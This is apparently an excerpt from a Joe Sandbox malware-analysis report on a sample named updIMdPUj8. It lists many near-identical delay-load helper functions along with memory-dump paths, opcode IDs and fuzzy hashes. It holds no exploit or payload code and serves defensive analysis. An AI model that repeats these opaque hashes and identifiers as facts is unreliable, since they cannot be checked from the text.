                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: fbd4d517302441a2eaf217c3f5bc13166a2ece703bb2f4b4fddc6610e66ff1a8
                                                                                                                                                                          • Instruction ID: 9ec2fba05d7ba6e0666b39e4483b9fbccdc243804dc5b2e1c5db7a2d2dd20fe6
                                                                                                                                                                          • Opcode Fuzzy Hash: fbd4d517302441a2eaf217c3f5bc13166a2ece703bb2f4b4fddc6610e66ff1a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 43B09292258100AC210462452806D3711CDC085F1173080EBBC25D01D0E840E8080531
                                                                                                                                                                          Function 00B3E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 6ecb994610b7786a84abd1522da3b205714d97a96fd69ffad64026199b207537
                                                                                                                                                                          • Instruction ID: df245a4066bff2c670468fec219725a3f2574504f2a1a8fe7fe995e0b33374b1
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ecb994610b7786a84abd1522da3b205714d97a96fd69ffad64026199b207537
                                                                                                                                                                          • Instruction Fuzzy Hash: 75B09296258200AC310461896846D3711CDD084F1173040EBB825D00D0B840AC480631
                                                                                                                                                                          Function 00B3E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 7d82b9063c0b196e97b9a544b063873e91d27058b0d45affee31ed96a8427dd9
                                                                                                                                                                          • Instruction ID: ef199042509317e78bbae5486ae39062721656e4ab040e85c873c523171aa6b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d82b9063c0b196e97b9a544b063873e91d27058b0d45affee31ed96a8427dd9
                                                                                                                                                                          • Instruction Fuzzy Hash: 4BB09296258200AC210421856C46C3711CDC085F1173084EBBC21E04D0F840EC480431
                                                                                                                                                                          Function 00B3E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: f4190ac307e676e74d325b634bc4a3bdf804ee8bfe07026fe7ad55b788df6412
                                                                                                                                                                          • Instruction ID: 02317f4fb262f42534f05cade2a2e0bac58797efcebb7205b9597da75dc86ff0
                                                                                                                                                                          • Opcode Fuzzy Hash: f4190ac307e676e74d325b634bc4a3bdf804ee8bfe07026fe7ad55b788df6412
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB092A2258101AC2104A1452986D3711CDC084F11B3040EBB825D00D0A840A9090531
                                                                                                                                                                          Function 00B3E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: a09057083e3e5d5365b1934765686daa0adf773f94b818c2dad9848ee8a43333
                                                                                                                                                                          • Instruction ID: c642755d2871fe2019b677b93b0cea02d7048d3f8438ec37177cb4a1918baeb0
                                                                                                                                                                          • Opcode Fuzzy Hash: a09057083e3e5d5365b1934765686daa0adf773f94b818c2dad9848ee8a43333
                                                                                                                                                                          • Instruction Fuzzy Hash: F4B092A2258100AC214461452946D3711CEC084F1173040EBB825D00D0E840AA090531
                                                                                                                                                                          Function 00B3E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 33dbf7a401a5083e263da67f06e6b7d1671be410be53e4a49af4a780a61bd9fa
                                                                                                                                                                          • Instruction ID: b365921d7777cf87f52795afef66acaa8870e957e8a1b53e77a4f3b99bb20597
                                                                                                                                                                          • Opcode Fuzzy Hash: 33dbf7a401a5083e263da67f06e6b7d1671be410be53e4a49af4a780a61bd9fa
                                                                                                                                                                          • Instruction Fuzzy Hash: CEB012E2258100EC314471462C07D3711CED0C4F1173040FFFC25D00D0F840ED080531
                                                                                                                                                                          Function 00B3E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: d140903eb5aad0609c6ad5578578ed8f45556dce63e17d58f1b41356be19b58f
                                                                                                                                                                          • Instruction ID: 060c9860ca44d7f03b6af6de8d12e643147139f2ccf911e2b716fb0afe4adbbb
                                                                                                                                                                          • Opcode Fuzzy Hash: d140903eb5aad0609c6ad5578578ed8f45556dce63e17d58f1b41356be19b58f
                                                                                                                                                                          • Instruction Fuzzy Hash: 8AB092A2258200AC218461456806D3711CEC084F11B3041EBB825D00D0A840A9480631
                                                                                                                                                                          Function 00B3E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 08c3d4c2d983826d83d3a9698dc28556ca9c98781d39ed2207f7c8d05e8fb7ad
                                                                                                                                                                          • Instruction ID: e98762d73df7f69a3c010337e8f4d634bed7927c8d126f706f251e8e948a3224
                                                                                                                                                                          • Opcode Fuzzy Hash: 08c3d4c2d983826d83d3a9698dc28556ca9c98781d39ed2207f7c8d05e8fb7ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 90B092A2258100AC214461452806D3711CEC085F1173080EBBC25D00D0E840E9080531
                                                                                                                                                                          Function 00B3E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: e84fdc29cfac34709b868cb3c31750a1a5c87f4af6b696089e043654a418c2a9
                                                                                                                                                                          • Instruction ID: f2f7da7f7df80c27ce8c12ec1dcef80f4fc1d7ca67d96d20a9132d271e2f33f5
                                                                                                                                                                          • Opcode Fuzzy Hash: e84fdc29cfac34709b868cb3c31750a1a5c87f4af6b696089e043654a418c2a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 88B09292258240AC214462456806D3711CDC084F1173081EBB825D01D0A840E8480631
                                                                                                                                                                          Function 00B3E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: a5ee7cbbba31cd67ec0f4726d4784953e66d4233a9fd7aa93824ef19faffc341
                                                                                                                                                                          • Instruction ID: 8b008298efbecbdf5e6fb6d65446596d0ad19e8ee0ff3a808472cb1a8127c949
                                                                                                                                                                          • Opcode Fuzzy Hash: a5ee7cbbba31cd67ec0f4726d4784953e66d4233a9fd7aa93824ef19faffc341
                                                                                                                                                                          • Instruction Fuzzy Hash: EAB09292258100AC210462452946D3711CDD084F1173080EBB825D01D0A850E90D0531
                                                                                                                                                                          Function 00B3E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 026800ae22c274fd9aa9551e0ac8a3d4df34ffafef20d7ee44b926f9d9086c20
                                                                                                                                                                          • Instruction ID: 59668bc08e19e0f82aff382c872cf3bd892e585113897d32a5b28f3b3acdedd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 026800ae22c274fd9aa9551e0ac8a3d4df34ffafef20d7ee44b926f9d9086c20
                                                                                                                                                                          • Instruction Fuzzy Hash: 0CB012D2269140EC310471852C07D3711CED4C4F11B3040FFFC26D00D0F840EC080531
                                                                                                                                                                          Function 00B3E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: f0b744ad912360a26c5dc38ab0b8faec330ff53634dea88062e10e6689225ad7
                                                                                                                                                                          • Instruction ID: df381304a58f776de0e4b9888d64f7d5dbd231c3922b4eb8779a06d7271c8b3c
                                                                                                                                                                          • Opcode Fuzzy Hash: f0b744ad912360a26c5dc38ab0b8faec330ff53634dea88062e10e6689225ad7
                                                                                                                                                                          • Instruction Fuzzy Hash: 07B012D2258101EC3104B1552C47D3711CDC0C5F1173080FFFC25D00D0F940EC080531
                                                                                                                                                                          Function 00B3E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: efe4fc70ebcdc337dd25cfd6d1c96a51eb9fc5c1dbdbd77f77327a01e1c1bbfe
                                                                                                                                                                          • Instruction ID: 136b796e7554afeb52d5091061158bae4b3b7ddba597c6488da3542c9b05bd5b
                                                                                                                                                                          • Opcode Fuzzy Hash: efe4fc70ebcdc337dd25cfd6d1c96a51eb9fc5c1dbdbd77f77327a01e1c1bbfe
                                                                                                                                                                          • Instruction Fuzzy Hash: 0BB092A2259240AC214462456806D3711CEC084F11B3041EBB825D00D0A840A8480631
                                                                                                                                                                          Function 00B3E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
